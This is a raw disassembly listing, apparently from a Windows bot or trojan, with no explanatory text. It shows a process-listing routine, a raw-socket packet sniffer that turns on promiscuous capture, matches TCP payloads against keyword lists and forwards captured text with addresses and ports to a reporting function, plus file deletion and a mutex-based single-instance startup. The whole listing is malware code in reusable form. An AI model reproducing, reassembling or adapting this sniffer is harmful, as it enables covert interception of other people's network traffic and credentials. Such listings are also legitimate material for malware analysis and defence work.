jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D5CC
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D6FC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D758
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7CC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D810
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41D9DC
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41D9A8
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DE30
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DA10
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4167F1 proc near ; DATA XREF: start_0-11D00�o
var_12F4 = dword ptr -12F4h
var_12F0 = dword ptr -12F0h
var_12EC = byte ptr -12ECh
var_115C = byte ptr -115Ch
var_1128 = dword ptr -1128h
var_1121 = byte ptr -1121h
var_1120 = byte ptr -1120h
var_101C = dword ptr -101Ch
var_1018 = byte ptr -1018h
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 2
call dword_4170F4 ; SetErrorMode
and [ebp+var_4], 0
push dword_41DA54
push dword_41DA50
push 3B6h
push dword_41DA4C
push 0
push dword_41DA48
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp+var_115C]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and [ebp+var_1128], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: sub_4167F1:loc_4168BA�j
mov eax, [ebp+var_1128]
inc eax
mov [ebp+var_1128], eax
loc_416875: ; CODE XREF: sub_4167F1+75�j
cmp [ebp+var_1128], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: sub_4167F1+8B�j
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp+var_115C]
push eax
push 0
push 0
call dword_4170F8 ; CreateMutexA
mov [ebp+var_12F0], eax
cmp [ebp+var_12F0], 0
jz short loc_4168BA
call dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: sub_4167F1+BB�j
; sub_4167F1+C5�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: sub_4167F1+C7�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DA48
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DA48
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov dword_41EC30, eax
call sub_410422
mov dword_41EC34, eax
call sub_410422
mov dword_41EC38, eax
call sub_410422
mov dword_41EC3C, eax
push 104h
lea eax, [ebp+var_1120]
push eax
push 0
call dword_41708C ; GetModuleHandleA
push eax
call dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DE30
push offset dword_41EB2C
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: sub_4167F1+158�j
lea eax, [ebp+var_1120]
